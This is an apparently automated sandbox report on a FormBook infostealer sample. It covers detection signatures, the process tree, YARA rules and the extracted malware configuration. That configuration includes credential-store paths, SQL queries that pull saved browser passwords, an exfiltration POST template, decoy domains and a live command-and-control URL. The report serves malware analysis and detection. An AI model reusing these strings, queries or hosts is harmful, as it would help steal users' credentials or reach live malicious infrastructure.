Play interactive tour

Edit tour

Analysis Report J0OmHIagw8.exe

Overview

General Information

Sample Name:	J0OmHIagw8.exe
Analysis ID:	339323
MD5:	92ff500a693078263908c83b4b290481
SHA1:	fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256:	767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Tries to download HTTP data from a sinkholed server

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Binary contains a suspicious time stamp

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

J0OmHIagw8.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\J0OmHIagw8.exe' MD5: 92FF500A693078263908C83B4B290481)

schtasks.exe (PID: 5856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 4116 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)

vbc.exe (PID: 5800 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 3448 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 5864 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa2778:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa2b12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x158352:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xae825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x164065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xae311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x163b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xae927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x164167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xaea9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1642df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa352a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x158d6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xad58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x162dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa42a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x159ae2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb3917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x169157:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb49ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0849:$sqlite3step: 68 34 1C 7B E1 0xb095c:$sqlite3step: 68 34 1C 7B E1 0x166089:$sqlite3step: 68 34 1C 7B E1 0x16619c:$sqlite3step: 68 34 1C 7B E1 0xb0878:$sqlite3text: 68 38 2A 90 C5 0xb099d:$sqlite3text: 68 38 2A 90 C5 0x1660b8:$sqlite3text: 68 38 2A 90 C5 0x1661dd:$sqlite3text: 68 38 2A 90 C5 0xb088b:$sqlite3blob: 68 53 D8 7F 8C 0xb09b3:$sqlite3blob: 68 53 D8 7F 8C 0x1660cb:$sqlite3blob: 68 53 D8 7F 8C 0x1661f3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: J0OmHIagw8.exe PID: 5816	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\J0OmHIagw8.exe' , ParentImage: C:\Users\user\Desktop\J0OmHIagw8.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', ProcessId: 5856

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT	Avira URL Cloud: Label: phishing
Source: http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 5.2.vbc.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", 